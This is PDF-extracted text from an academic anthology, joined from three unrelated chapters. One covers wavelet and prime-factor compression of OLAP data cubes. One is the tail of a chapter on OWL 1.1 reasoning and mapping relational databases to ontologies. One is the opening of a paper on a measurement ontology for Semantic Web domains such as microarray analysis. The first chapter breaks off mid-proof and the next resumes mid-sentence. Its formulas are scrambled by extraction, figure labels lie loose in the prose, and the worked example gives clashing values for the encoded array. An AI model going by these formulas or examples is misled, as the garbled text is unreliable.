encoding and decoding procedures used in wavelet data compression.
Wavelet Data Compression Scheme The wavelet scheme compresses by transforming the source data into a representation (the wavelet transform array or WTA) that contains a large number of zero or near-zero values. The transformation uses a series of averaging operations that operate on each pair of neighboring source data elements. In this manner the original data is transformed into a data set (the Level 1 transform set) that contains the averages of pairs of elements from the original data set. The pair-wise averaging process is then applied recursively on the Level 1 transform set. The process continues in this manner until the size of the transformed set is equal to 1. In order to be able to reconstruct the original data the pair-wise differences between neighbors is kept in addition to the average. The WTA array then consists of all pair-wise averages and differences accumulated across all levels. A thresholding function is then applied on the WTA to remove a large fraction of array elements which are small in value. The thresholding function applies a weighting scheme on the WTA elements as those elements at the higher levels play a more significant role in reconstruction than their counterparts at the lower levels. For details of the wavelet encoding and decoding techniques the reader is referred to (Vitter & Wang, 1999).
Wavelet Decoding The decoding process reconstructs the original data by using the truncated version of the WTA. The decoding process is best illustrated with the following example. Figure 1 shows how the coefficients of the original array are reconstructed from the WTA (the C coefficients hold the original array while the S coefficients hold the WTA). Any coefficient C(i) is reconstructed by using its ancestor S coefficients in the path from the root node to itself. Thus for example, C(0) = S(0) +S(1)+S(2) +S(4) and C(1) = S(0)+S(1)+S(2)S(4).
2327
Optimization of Multidimensional Aggregates in Data Warehouses
Figure 1. The wavelet reconstruction process
S0
S1
S2
S3
S4
C0
S5
C1
C2
S6
C3
Consider a scenario where S(4), although relatively large in comparison to S(0), S(1) and S(2), is thresholded out due to its lower weighting, thus leading to inaccuracies in the estimation of C(0) and C(1). This is symptomatic of the general case where the lower level coefficients are significant contributors to the reconstruction process but are thresholded out to make way for their more highly weighted ancestor coefficients. The problem is especially acute in the case of data that is both skewed and have a high degree of variability.
THE PRIME FACTOR SCHEME The scheme works broadly on the same lines as the wavelet technique in the sense that data compression is used to reduce the size of the data cube prior to processing of OLAP queries. OLAP queries are run on the compressed data, which is decoded to yield an approximate answer to the query. Our encoding scheme uses pre-processing to reduce the degree of variation in the source data
2328
C4
S7
C5
C6
C7
which results in better compression. An overview of the encoding process is given in the following section.
Overview of Prime Factor Encoding Scheme The data is first scaled using the standard minmax scaling technique. With this technique, any value V in the original cube is transformed into V’, where V’ =(V-min)*(nmax-nmin)/(maxmin)+nmin, where min, max represent the minimum and maximum values respectively in the original data cube; nmin and nmax are the corresponding minimum and maximum values of the scaled set of values. Each scaled value V’ is then approximated by its nearest prime number in the scale range [nmin, nmax]. The choice of nmin and nmax influences both the degree of compression and the error rate as we shall show later in the “Experimental Setup” section. The rationale behind the scaling is to induce a higher degree of homogeneity between values by compressing the original scale [min, max] into
Optimization of Multidimensional Aggregates in Data Warehouses
Elias Encoding of Prime Factor Array
Prime Factor Encoding
Chunked input stream Chunking of scaled values
Scaled values in tighter range
Prime Factor Array
Encoded Stream
Figure 2. Overview of the prime factor scheme
Min Max Scaling
a smaller scale [nmin, nmax], with nmin ≥ min and nmax < max. In doing so, this pre-processing step improves the degree of compression. The scaled data cube is then partitioned into equal sized chunks. The size of the chunk c represents the number of cells that are enclosed by the chunk. The size of the chunk affects the decoding (query processing) time. Higher values mean fewer chunks need to be decoded, thus reducing the decoding time (see Theorem 3 in the section Online Reconstruction of Queries). Each chunk is encoded by the prime factor encoding algorithm which yields an array containing 2c cells. Although the encoded version has twice the number of cells it is much smaller in size since each cell is very small in numerical value. In fact, our experimental results reveal that the vast majority of values are very small integers (see Figures 10(a) and 10(b) in the Experimental Setup section). Figure 2 summarizes the prime factor encoding process. In addition to transforming values to very small integers, the other major benefit of the algorithm is that the integers are highly skewed in value towards zero. For example, on the census data set (U.S. Census), with a chunk size of 64, over 75% of the values turned out to be zero. These results were also borne out with the synthetic data sets that we tested our scheme on. The source (original) data in some of these data sets were not skewed in nature, showing that the skew was induced, rather than being an inherent feature of the original data. We exploited the skewed nature of the encoded data by using the Elias variable length coding scheme (Elias, 1975). Elias encoding works by encoding smaller integers in a smaller number of bits, thus further improving the degree of compression. The next section will describe the details involved in step 3 of the above process, the PFC encoding algorithm.
2329
Optimization of Multidimensional Aggregates in Data Warehouses
The Prime Factor Encoding Algorithm The algorithm takes as its input the scaled set of values produced by the min-max scaling technique. For each chunk, every scaled value is converted into the prime number that is closest to it. We refer to each such prime number as a prime factor. The algorithm makes use of two operators which we define below. Both operators α and β take as their input a pair of prime factors Vk and Vk+1. Definition 1: The operator α is defined by α(Vk ,V k+1) = nearest prime (Vk +V k+1 +I(V k+1)- I(Vk)), where I(V k+1), I(Vk) denote the ordinal (index) positions of V k+1 and Vk on the prime number scale. The operator takes two primes (V k ,V k+1) adds them together with the difference in index positions between the 2nd prime and the 1st prime and converts the sum obtained to the nearest prime number. Definition 2: The operator β is defined by β(Vk ,V k+1) = nearest prime(Vk +V k+1 ).
The α operator is applied pair-wise across all values (a total of c prime factors) in the chunk. This yields a stream of c/2 prime factors. The α operator is then applied recursively on the processed stream until a single prime factor is obtained. This recursive procedure gives rise to a tree of height log2c where c is the chunk size. We refer to this tree as the prime index tree. In parallel with the construction of the prime index tree we construct another tree, called the prime tree. The prime tree is constructed in the same manner as its prime index counterpart except that we apply the β operator, instead of the α operator. We illustrate the construction of the trees with the help of the following example. For the sake of simplicity we take the cube to be of size 4, the chunk size c to be 4 (i.e. we have only one chunk) and the scale range [nmin, nmax] to be [0, 101]. For the prime index tree (Figure 3(a)), the prime values 37 and 2 at the leaf level are summed as 37+2+I(2)-I(37), which is transformed to its nearest prime number, 29. Similarly 71 and 97 when processed yield the prime number, 173.
Figure 3(a). The construction of the prime index tree
Figure 3(b). The construction of the prime tree
233
199
11
29
2330
41
173
37
13
52
2
1
71 21
97 26
13
167
37
37
13
47
2
1
71
21
40
97
26
Optimization of Multidimensional Aggregates in Data Warehouses
The node values 29 and 173 in turn yield a root value of 233. As shown in Figure 3(b), the leaf values 37 and 2 when summed and converted into its nearest prime yields a value of 37. Following the same process, we obtain values of 167 and 199 for the remaining nodes. We annotate each internal node by its corresponding index value. The encoded array E now consists of the differences in index positions across corresponding positions in the two trees. These differences are referred to as differentials. For the example in Figure 3 the array turns out to be E = {5, -2, 1}. We also store the index value of each prime tree root separately in another array R. Each chunk gives rise to its own prime tree root, and for the simple example above, since we have only one chunk, this results in a single value {47} for R. Decoding requires the use of the two arrays E and R. We start with the first value in array R, which is 47, and then add it to the first value in array E which is 5, yielding the value 52. We use 52 as an index into a table of primes (this table has the pseudo prime 0 added to it with index value 0) and extract 233 as the corresponding prime value. We now search for pairs of primes (P1, P2) which satisfy the condition:
set of offsets for the tree above is {0, 0, 0}. The complete version of E contains the sequence of differentials followed by the sequence of offsets. Thus for our example we have E = {5,2,-1,0,0,0}. We are now able to decode by descending both trees in parallel and recover the original set of leaf values 37, 2, 71 and 97. For ease of understanding, the encoding process above has been described for a 1-d dimensional case. The extension to d dimensions follows naturally by encoding along each dimension in sequence. For example, if we have a 2 dimensional cube we would first construct 2- dimensional chunks. With a chunk size of 16 and the use of equal width across each dimension, each chunk would consist of a 4 by 4 2-d array. We first run the encoding process across dimension D1. This would yield a 1-dimensional array consisting of 4 prime root values for each chunk. The differentials and offsets that result from this encoding are stored in a temporary cache. The 4 prime root values from encoding on D1 are then subjected to the encoding process across dimension D2 to yield the final encoding. The differentials and offsets that result from encoding along D2 are merged with those from encoding along dimension D1 to yield the final set of encoded values.
α(P1, P2) = 233, β(P3, P4) = 199, I(P3) = I(P1+2) and I(P4) = I(P2-1) --------(1), where P3, P4 are the corresponding nodes to P1, P2 in the prime tree
Encoding Performance
This search in general would yield a set S of candidate pairs for (P1, P2) rather than a single pair. In order to extract the correct pair, we associate an integer with each internal node of the prime index tree which records the ordinal position within the set S which would enable us to descend to the next level of the tree. In this case this integer turns out to be 0 since there is only one pair that satisfies condition (1). These integers are collectively referred to as offsets. The complete
The encoding takes place in four steps as given in Figure 2. Steps 1 and 2, involving scaling and chunking, can be done together. As data is read it can be scaled on the fly with the chunking process. If the original data is stored in dimension order (D1, D2, ……Dd) with the rightmost indices changing more rapidly, then it can be shown the I/O complexity involved in chunking is ⎛N N⎞ O⎜ log M ⎟ ⎜B B ⎟⎠ , B ⎝
2331
Optimization of Multidimensional Aggregates in Data Warehouses
where M is the available memory size and B is the block size of the underlying database system. The reader is referred to [Vitter 1999] for a proof. The I/O complexity of steps 3 and 4 is ⎛N⎞ O⎜ ⎟ ⎝ B ⎠.
Thus the I/O complexity is bounded by the ⎛N N⎞ O⎜ log M ⎟ ⎜B B ⎟⎠ B ⎝
term required for the chunking step. However, it should be noted that this only reflects a one-time cost in reorganizing the data from dimension order to chunked format. Once this is done no further chunking is required as updates to values do not affect the chunk structure. Thus, the time complexity on a regular basis would be bounded above by ⎛N⎞ O⎜ ⎟ ⎝ B ⎠.
The only exception occurs when the dimensions are reorganized and either grow or shrink as a result. This would require repetition of the chunking step.
The Rationale behind the Prime Factor Algorithm Prime numbers provide us with a natural way of constraining the search space since they are much less dense than ordinary integers. The first 100 positive integers are distributed across only 25 primes. At the same time the primes themselves become less dense as we move up the integer scale (Andrews, 1994). The next 900 positive integers after 100 only contain 143 primes. This means that the prime number encoding technique has good scalability with respect to data value size.
2332
From the error point of view the use of primes introduces only small errors as it is possible to find a prime in close neighborhood to any given integer (Andrews, 1994). Theorem 1 gives the distribution of primes in the general case. Theorem 1: The number of prime numbers less than or equal to a given number N approaches N log e ( N )
for large N. Proof: The reader is referred to (Andrews, 1994) for a proof. Theorem 1 reinforces the observations made above. First, the division by the logarithm term ensures that the primes are less dense that ordinary integers. Second, the average gap between a given prime N and its successor is approximately ⎛ N ⎞ ⎟⎟ = log e N . N / ⎜⎜ ⎝ log e N ⎠
This means that encoding a number N using its nearest prime will result in an absolute error of 1 log e N 2
on the average. These properties make prime numbers an attractive building block for encoding numerical data. The basic idea that we utilize is to convert a stream of primes into a single prime, the prime tree root value by a series of pair wise add operations. We then augment the root value with a set of coefficients to enable us to decode. The use of prime numbers enables us to drastically reduce the search space involved in decoding and as a consequence reduce the space required to store the encoded data. As an example, consider the prime root value of 29. In order to decode (assuming that
Optimization of Multidimensional Aggregates in Data Warehouses
we simply use the prime tree) to the next level we have to consider just eight combinations (5,23), (23,5), (7,23), (23,7), (11,19), (19,11) , (13, 17) and (17,13). On the other hand if prime numbers were not used as the basis, then we would have a total of 30 combinations to consider—in general, if N were the prime root, then N+1 combinations would have to be tested. The use of the prime index tree in conjunction with the prime tree enables us to constrain the search space even further. With the introduction of the former we are able to distinguish between pairs such as (5,23) and (23,5). The pair (5,23) encodes as 31 in the Prime Index tree and 29 in the prime tree, whereas (23,5) encodes as 23 in the prime index tree and 29 in the prime tree. Apart from this, the other major benefit of growing two trees instead of one is that we can encode taking the differentials between corresponding nodes across the two trees rather than node values themselves. Since the two trees evolve from a common set
of leaf values, the α and β operators evaluate to approximately the same values which in turn causes the differentials to be much smaller than the node values themselves (see Figure 10(a) in the “Experimental Setup” section).
Encoding Error Rate for the Prime Factor Algorithm In this section we present a formal analysis for the average relative error involved in decoding with the prime factor scheme. Theorem 2 quantifies this error rate. Theorem 2: The average relative error is approximately 1 log e (CV ) where C is the chunk 2
V
size, and V is the average value of an element within a chunk. Proof Sketch: Consider the Prime tree given in Figure 4 with chunk size 8.
Figure 4. Error tree for Chunk Size 8
2333
Optimization of Multidimensional Aggregates in Data Warehouses
The value of an internal node, say P9, is given by P9 = P1 + P2 + ΔP , P where Δ is an error term 2 1 that denotes the approximation to the nearest prime number. Similarly, P10 = P3 + P4 + ΔP , P and P13 = P9 4 3 + P10 + ΔP , P . 10 9 Substituting P9 for P10 and in the expression for P13 we obtain P13 = P1 + P2 + P3 + P4 + ΔP , P 2 1 + ΔP , P + ΔP , P . 4 3 10 9 Thus it can be seen that a parent node’s value is given by the sum of the values of the leaf node values that can be reached by the parent node plus the error terms at the intermediate node levels. In general, we have P2C–1, the root node value given by C −1
C
P2C −1 =
∑ ∑Δ Pi +
i =1
P2i , 2i −1
i =1
Each error can now be written as Δ P2 i , 2 i −1 =
1 log e ( K iT ) 2 .
Thus from (1), we have ≈
1 2
C −1
C −1
∑ log ( K T ) ≈ 2 ∑ log ( K ) + 2 (C − 1) log (T ) 1
e
1
i
e
i =1
i
e
i =1
≈
1 2
C −1
∑ ( K − 1) + 2 (C − 1) log (T ) 1
i
e
i =1
using the Taylor series expansion for the log function and taking a first order approximation for 0 ≤ Ki ≤ 2. From the definition of Ki, we have C −1
∑K
.
i
≈ log 2 (C )
i =1
.
The sum of the values T in the chunk is given Since
beauty of OWL 1.1 reasoning is that it always terminates and produces a correct result – this is guaranteed by the relatively tough syntactic limitations on OWL 1.1 expressivity – remember, that due to these limitations we could not express in OWL 1.1 one of the original (not so complex) constraints, that students may take only courses included in the same AcademicProgram to which the student has enrolled. The next block of reasoner output is Classification. This output is not directly relevant for specific SPARQL queries, but is considered useful for other ontology applications – it shows the inferred subsumption graph between all classes and the most specific class for each individual. Even for our university enrollment dataset this classification result clearly shows that Student3 and Teacher3 have dual roles. Finally, the line “Consistent: Yes” is one of the most important output lines. It assures that the whole ontology, its constraints, and data are consistent (do not lead to any logical contradictions). Consistency there is checked in a rather strong manner: the reasoner checks that all ontology classes are satisfiable (can possibly have any instances). This is a very useful ontology debugging tool, because, obviously, it makes no sense to have unsatisfiable classes in the ontology and therefore clearly indicates an error. In case ontology turns out to be inconsistent (unsatisfiable), the Pellet reasoner outputs a detailed explanation of which ontology triples have caused the contradiction. We will conclude this very brief introduction to OWL 1.1 reasoning with restating that reasoning can be viewed as a very powerful extension to the SPARQL querying engine of the more traditional RDF databases. But this extension comes at a cost – slower query execution and OWL 1.1 limitations compared to the OWL Full expressivity. Nevertheless, it is always advisable to try to stay within OWL 1.1 limits – even if not everyone will use such ontologies with a reasoner, the reasoning possibility enables much
2380
deeper level of debugging and more flexible uses for such ontologies.
CONCLUSION In this chapter we have discussed the new outstanding possibilities enabled by the use of RDF/OWL technology besides with the traditional relational database systems. The benefits range from reuniting the conceptual model of the database (OWL ontology) with the actual data (RDF data) for enabling direct semantically meaningful SPARQL queries, to the possibility of using a powerful description logic reasoner for advanced queries and conceptual model debugging. Not any database is complete in itself - almost all databases contain information that can be combined with the information in other databases. Connecting these diverse data sources is a challenging task which can be supported by ontologies describing them. Although there are traditional meta-search engines and data mining tools for a number of databases relying on hand-fitted interfaces, these have to be refitted after every change in the database schema. The new approach would allow for more generic query systems and ontology and data browsing applications, including graphic ones in the style of (Athanasis, 2004; Berners-Lee, 2006). This would substantially ease the task for a user to find data across different databases which use these ontologies.
ONGOING AND FUTURE RESEARCH DIRECTIONS Here we would like to bring attention to the few more radical development directions, which have been largely omitted in the main body of the chapter due to their present immaturity. Nevertheless, following research directions are likely to shape the future of this research area.
From Databases to Ontologies
•
•
•
Integration of multiple databases through their ontology mapping to the common upper ontology. This approach has generally failed on the global semantic web scale, but it is completely realistic on even a large enterprise scale. Development of standard and widely accepted ontologies (or just vocabularies) for narrow domains, such as DublinCore, FOAF, and lately SIOC are facilitating this process, along with national ontology standardization initiatives (Hyvonen, 2007; Niemann, 2007). Need for bidirectional SPARQL extension with support for CREATE, DELETE, UPDATE statements. Semantic web initially was envisioned as a distributed read-only medium similar to the classic web, but the current embracing of these technologies as a potential substitute for the relational databases requires also a bidirectional query language. One of the developments in this direction is SPARQL/Update language (nicknamed "SPARUL"). RDF quad stores is a new trend in RDF database design, where each RDF triple is complemented with a fourth URI pointing to the “Named Graph” (source file or database) from which this particular RDF triple has been generated. Quad stores is a simple and yet effective solution to RDF data versioning, access-rights management, and finally also to the management of trust into various RDF data sources.
REFERENCES An, Y., Borgida, A., & Mylopoulos, J. (2005). Inferring complex semantic mappings between relational tables and ontologies from simple correspondences. In ODBASE’05, (pp.1152-1169). Athanasis, N., Christophides, V., & Kotzinos, D. (2004). Generating on the fly queries for the
Semantic Web: The ICS-FORTH Graphical RQL interface (GRQL). In LNCS, 3298, 486-501. Baader, F., Calvanese, D., McGuinness, D.L., Nardi, D., & Patel-Schneider, P.F. (2003). The description logic handbook: Theory, implementation, applications. Cambridge University Press. Barzdins, J., Barzdins, G., Balodis, R., Cerans, K., et.al. (2006). Towards semantic latvia. In Communications of 7th International Baltic Conference on Databases and Information Systems (pp.203-218). Berners-Lee, T. (1998). Relational databases on the Semantic Web. Retrieved December 15, 2007, from http://www.w3c.org/DesignIssues/RDBRDF.html Berners-Lee, T., et.al. (2006). Tabulator: Exploring and analyzing linked data on the Semantic Web. LNCS, 4273, 158-171. Berners-Lee, T., Hendler, J., & Lassila, O. (2001, May 29-37). The Semantic Web. Scientific American. Bizer, C., & Cyganiak, R. (2006). D2R server Publishing releational databases on the Semantic Web. In Poster at the 5th International Semantic Web Conference. Retrieved December 15, 2007, from http://sites.wiwiss.fu-berlin.de/suhl/bizer/pub/Bizer-Cyganiak-D2R-Server-ISWC2006. pdf Borgida, A. (2007). Knowledge representation meets databases – A view of the symbiosis. In Proceedings of the 20th international workshop on Description Logics. CEUR Workshop Proceedings, 250, 1-11. Retrieved December 15, 2007, from http://ceur-ws.org/Vol-250/invited_3.pdf Hepp, M., & Bruijn, J. (2007). GenTax: A generic methodology for deriving OWL and RDFS ontologies from hierarchical classification, thesauri, and inconsistent taxonomies. LNCS, 4519, 129-144.
2381
From Databases to Ontologies
Hyvonen, E., Viljanen, K., Makela, E., et al. (2007). Elements of a National Semantic Web infrastructure - Case study Finland on the Semantic Web. In Proceedings of the First International Semantic Computing Conference (IEEE ICSC 2007), IEEE Press. Kupfer, A., Eckstein, S., Neumann, K., & Mathiak, B. (2006). Keeping track of changes in database schemas and related ontologies. In Communications of 7th International Baltic Conference on Databases and Information Systems (pp.63-68). Laborda, C.P., & Conrad, S. (2006). Bringing relational data into the Semantic Web using sparql and relational.owl. In Proc. of the 22nd Int. Conf. on Data Engineering Workshops (ICDEW’06), (pp. 55-62). Niemann, B.L. (2007). New enterprise data management strategy for the U.S. Government: Support for the Semantic Web. In W3C Workshop on RDF Access to Relational Databases. Retrieved December 15, 2007, from http://www. w3.org/2007/03/RdfRDB/papers/niemann.doc ODM (2007). Ontology definition metamodel. OMG Adopted Specification, Document Number: ptc/2007-09-09. Retrieved December 15, 2007, from http://www.omg.org/docs/ptc/07-0909.pdf OWL (2004). Web ontology language (OWL). W3C Specification. Retrieved December 15, 2007, from http://www.w3.org/2004/OWL/ OWL 1.1 (2006). OWL 1.1 Web ontology language. Submission Request to W3C. Retrieved December 15, 2007, from http://www.w3.org/ Submission/2006/10/ Sirin, E., & Parsia, B. (2007b). SPARQL-DL: SPARQL Query for OWL-DL. In Proceedings of the 3rd OWL Experiences and Directions Workshop (OWLED-2007). CEUR Workshop Proceedings, Vol 258. Retrieved December 15, 2007, from http://ceur-ws.org/Vol-258/paper14.pdf
2382
Sirin, E., Parsia, B., Cuenca Grau, B., Kalyanpur, A., & Katz, Y. (2007a). Pellet: A practical OWLDL reasoner. Web Semantics: Science, Services and Agents on the World Wide Web, 5(2), 51-53. SPARQL (2007). SPARQL query language for RDF. W3C proposed recommendation. Retrieved December 15, 2007, from http://www.w3.org/TR/ rdf-sparql-query Tsarkov, D., & Horrocks, I. (2006). FaCT++ description logic reasoner: System description. Lecture Notes in Artificial Intelligence, 4130, 292-297. Yuan, J., & Jones, G.H. (2007). Enabling Semantic access to enterprise RDB data. In W3C Workshop on RDF Access to Relational Databases. Retrieved December 15, 2007, from http://www. w3.org/2007/03/RdfRDB/papers/yuan.html
ADDITIONAL READING As it was mentioned in the introduction, most of the tools and approaches described in this chapter are still under active research or development. Therefore it is impossible to recommend any solid introductory textbook, which would not be outdated. To follow up to date developments, our recommended additional reading starting-point is materials of the latest W3C Workshop on RDF Access to Relational Databases, available online.
ENDNOTES a
The class „Thing” is introduced in the UML diagram only to state that classes „Person”, „Course”, „PersonID”, and „AcademicProgram” are disjoint. Due to semi-formal semantics of classic UML, such high-level disjointness statements are seldom used in traditional UML diagrams – it is typically assumed that these diagrams will be used
From Databases to Ontologies
b
c
d
e
only by humans capable to guess disjointness of the classes from their meaningfull names. As a counter-example, classes „Student” and „Female”, if used within the same UML diagram, would not be assumed to be disjoint by the human reader. A similar commercial tool VOM (Visual Ontology Modeler) is developed by Sandpiper company and is available as an add-in to IBMs Rational Rose product. Throughout this chapter we will use OWL/N-TRIPLES ontology serialization format, because it is equivalent to the „RDF triples” format used later for data export and SPARQL queries over RDF databases. Unfortunately, many tools, such as Protégé and IODT store ontologies in OWL/XML format and do not support OWL/N-TRIPLE format directly. As a workaround, Sesame RDF database (discussed at the end of this Section) can be used to convert ontologies between OWL/XML and OWL/N-TRIPLES formats. Description Logic is a generic term for a wide variety of specific (syntactically recognizable) subsets of FOL. For example, OWL 1.1 corresponds to the SROIQ subset of FOL. OWL 1.1 is the largest algorithmically decidable subset of OWL Full, for which complete reasoners like Pellet and FaCT++ are available. OWL Lite and OWL DL are
f
g
subsets of OWL 1.1 introduced at earlier stages of OWL language development. In this chapter we use OWL 1.1. OWL reasoners are often used via DIG or OWL API interface from ontology editors like Protege, but for the purposes of this chapter more adequate is the native SPARQL interface of Pellet reasoner. Pellet reasoner can read OWL/N-TRIPLES format directly. Therefore N-TRIPLES from mentioned Figures 6,8,12 can be literally given to Pellet to reproduce the results shown in Figure 13.
APPENDIX: QUESTIONS FOR DISCUSSION 1.
2.
3.
Why it is hard to merge ontologies of disparate data sources even if they include complementary information about the same objects? (Conceptualizations used in different application domains are often incompatible.) Why relational databases and SQL queries are generally faster than corresponding RDF stores and SPARQL queries? (RDF can encode an arbitrary graph, not just linked tables.) Why OWL reasoners (such as Pellet or FaCT++) are not universally applicable? (Because not all real-life integrity constraints can be encoded in OWL 1.1)
This work was previously published in Semantic Web Engineering in the Knowledge Society, edited by J. Cardoso and M. Lytras, pp. 242-266, copyright 2009 by Information Science Reference (an imprint of IGI Global).
2383
2384
Chapter 8.2
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web Henry M. Kim York University, Canada Arijit Sengupta Wright State University, USA Mark S. Fox University of Toronto, Canada Mehmet Dalkilic Indiana University, USA
ABSTRACT This article introduces a measurement ontology for applications to Semantic Web applications, specifically for emerging domains such as microarray analysis. The Semantic Web is the next-generation Web of structured data that are automatically shared by software agents, which apply definitions and constraints organized in ontologies to correctly process data from disparate sources. One facet needed to develop Semantic Web ontologies of emerging domains is creating ontologies of concepts that are common to these
domains. These general “common-sense” ontologies can be used as building blocks to develop more domain-specific ontologies. However most measurement ontologies concentrate on representing units of measurement and quantities, and not on other measurement concepts such as sampling, mean values, and evaluations of quality based on measurements. In this article, we elaborate on a measurement ontology that represents all these concepts. We present the generality of the ontology, and describe how it is developed, used for analysis and validated.
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
INTRODUCTION According to Tim Berners-Lee, whom many attribute as the inventor of the World Wide Web, the Web will evolve into the Semantic Web, which relies upon using machine processable domain knowledge represented in ontologies to execute and compose automated Web services (BernersLee, Hendler, & Lassila, 2001; Chen, Zhou, & Zhang, 2006). An ontology is a data model that “consists of a representational vocabulary with precise definitions of the meanings of the terms of this vocabulary plus a set of formal axioms that constrain interpretation and well-formed use of these terms” (Campbell & Shapiro, 1995). Ontology use ensures that data instances are so precisely defined and constrained that the instances can be processed automatically and accurately by Web-based computer programs, or software agents. Berners-Lee’s et. al (2001) vision of the Semantic Web is that “many software agents, accessing data instances and applying ontologies to the instances, execute Web services in concert, where agents, data instances, and ontologies are distributed all over the Web.” Ontologies for the Semantic Web represent an emerging method for modeling the semantics required to interpret data. In a similar vein, applications such as genomics and GIS’s represent emerging domains represented for semantic modeling. There exist Semantic Web ontologies for traditional applications in computer science, and business (Davies, Duke, & Stonkus, 2002; Gandon & Sadeh, 2004; Klischewski & Jeenicke, 2004). There are also emerging domains modeled using traditional semantics modeling techniques (Khatri, Ram, & Snodgrass, 2004; Ram & Wei, 2004). There are even some ontologies of emerging domains such as representations of the Gene Ontology (Ashburner et al., 2000; Wroe, Stevens, Goble, & Ashburner, 2003) and a bioinformatics ontology (Stevens, Goble, Horrocks, & Bechhofer, 2002), which are represented in the de facto Semantic Web Ontology Language,
OWL (McGuinness & van Harmelen, 2003), or its predecessor, DAML+OIL (Bechhofer, Goble, & Horrocks, 2001). Although one of the goals of ontology development is a generalization of terms in an application, it is possible to make intelligent choices when several ontologies are available for the same domain (Lozano-Tello & Gomez-Perez, 2004). When contemplating the development of ontologies of any domain, it is instructive to state the following informal definition: “an ontology is an explicit representation of shared understanding” (Gruber, 1993). Gruber also outlines the conundrum of ontological commitment: the more one commits to represent a given domain in an ontology to make data more sharable for software applications closely associated with that domain’s needs, the less sharable the data becomes for other applications. For example, commitments made to develop a gene ontology useful for genomics applications render the ontology to be less likely to be used to share medical records data. Yet data sharing between genomics and patient care applications is critical in many situations. The remedy to this seeming conundrum is to identify general concepts that cut across many domains—the domains’ “common-sense”—and collect them in a common-sense ontology (Lenat, 1995; Milton & Kazmierczak, 2004). This ontology is separated from more domain-specific ones. In fact, terms in several domain-specific ontologies can be defined using terms from a common general ontology. For example, a molecular biological ontology may provide building block representations for a biomedical ontology, which in turn underpins both gene and health care ontologies. The general ontologies also underlie an ontology of a different perspective—that of costing (Fox & Gruninger, 1998). Arguably the ontologies of emerging domains, to be discussed below, make ontological commitments to their respective domains. It is prudent to ask, however, what are the common-sense ontologies that underlie these emerging domains?
2385
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Can their representations serve as building blocks to define Semantic Web ontologies of different emerging domains? The attributes shared among common emerging domains, which sets them apart from traditional business and computer science domains, is their grounding in the physical sciences. The common-sense of emerging domains is the common-sense of our physical world. There are common-sense models of time (Allen, 1983), space (Retz-Schmidt, 1988), causality (Reiger & Grinberg, 1977), and physics (Hayes, 1985; Kuipers, 1986). So how do traditional and emerging domains differ? We set our sights on the life sciences, since it is here that the most significant number of emerging technologies have taken place. The life sciences have relied on the so-called scientific method—discovery through a process of observation, hypothesis formulation and data generation. In these traditional domains, data play an ancillary role to the hypotheses (these domains are often referred to as “hypothesis driven”). For example, a scientist believes that two particular genes might have some kind of relationship in some stage of larval development in a D. melanogaster. Experiments are then conducted to validate this conjecture. The data are generally interesting only in the context of this experiment. There are long standing traditional as well as practical reasons (Attie, 2003) why data is put into this ancillary role, and we only present a few here: they need not be present during the observation and hypothesis formulation phases of discovery; furthermore, a surplus of data does usually little to enhance this process of discovery; data are often prohibitively expensive to produce or gather once, let alone many times. Emerging domains (Ronco, Grossel, Zimmer, & Socash, 2003), like bioinformatics (and particular areas of focus, for example, genomics, proteomics, metabolomics) through a direct consequence of recent and rapid advancements in technology, have taken the scientific method and made it, in a sense, stand on its head. There are also domains
2386
where data are generated and discoveries made without any preceding hypothesis (Attie, 2003) and are often referred to as “technologically driven.” Technology in this case typically refers to high-throughput gene product data where tens of thousands of interactions are measured in unison. To motivate our article, we will focus on microarrays (Duggan, Chen, Meltzer, & Trent, 1999; Mount, 2004), the most well-known and ubiquitous of the technologically driven data tools. Numerous challenges are faced by these emerging disciplines. One critical problem is data quality—many of the high throughput techniques, microarrays included, suffer from a great deal of noise (Lesk, 2005). Furthermore, no formal ANSI standards exist for managing these data systematically though some informal standards have emerged. One such standard is the MIAME format for microarrays (Duggan, Chen, Meltzer, & Trent, 1999; Mount, 2004), though this format does not include quality control information. So, handling data quality is made even more difficult and can be cast into a more general framework of measurement. There is the abstract and mathematical field of measurement theory (Roberts, 1979),which serves as a valuable reference for those works that represent measurement concepts in an ontology. Whether stated in formal data models (Goh, Bressan, Madnick, & Siegel, 1999; Novak, 1995), or as computational ontologies (Gruber & Olsen, 1994), works that can be considered ontologies of measurement are predominantly concerned with units of measurement, specifically using the ontology to accurately convert from one unit of measure to another. This holds for Semantic Web measurement ontologies for traditional domains; some examples are the measurement ontologies for KSL (Fikes & Farquhar, 1999), SHOE (Heflin, 2000), Cyc® (Lenat, 1995), SUMO (Pease & Niles, 2002) and GNU (Nozick, Turnquist, Jones, Davis, & Lawton, 2004) projects. The same can be said for emerging domains, and examples include the measurement units represented in
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
SEEK (ecology) (Bowers & Ludäscher, 2004), MGED (genomics) (Stoeckert Jr. & Parkinson, 2004), and PharmGKb (pharmacology) (Hewett et al., 2002) ontologies. Measurement theory is certainly more than just measurement unit conversions and quantities. Therefore, regardless of whether it is for traditional or emerging domains, or whether it is for the Semantic Web or closed networks, there is a definite research opportunity in developing an ontology that represents additional measurement common-sense. With such an ontology in tow, developers of Semantic Web ontologies of emerging domains as diverse as biology and geography have a reference for ensuring that important and subtle measurement concepts are diligently represented in their ontologies and not ignored. Ecolingua is an ontology for modeling ecological metadata (Brilhante & Robertson, 2001) and represents the important measurement notion of sampling. What is needed is a measurement ontology that, like Ecolingua, can be used for developing Semantic Web ontologies of emerging domains, but represents even more. We believe that the TOVE measurement ontology (Fox, 1992) is one of the most extensive ontologies for enterprise modeling (Noy & Hafner, 1997). This article elaborates on what had previously been written about this measurement ontology. We first provide two scenarios for ontology use: one for the emerging domain of genomics using microarrays and the other for the traditional domain of enterprise applications. We then present a demonstration of how the ontology can be used for this scenario. The demonstration has two parallel audiences. We show how the ontology can be used by a scientist who is working in one of these emerging domains, e.g., a bioinformatician who seeks to discover significant gene-gene interactions in the presence of noise, missing data, and conflicting data. We further demonstrate that this can transparently be cast in terms of an enterprise domain. We present arguments on generalizablity of the ontology.
Finally, we make concluding remarks and state our intentions for future work.
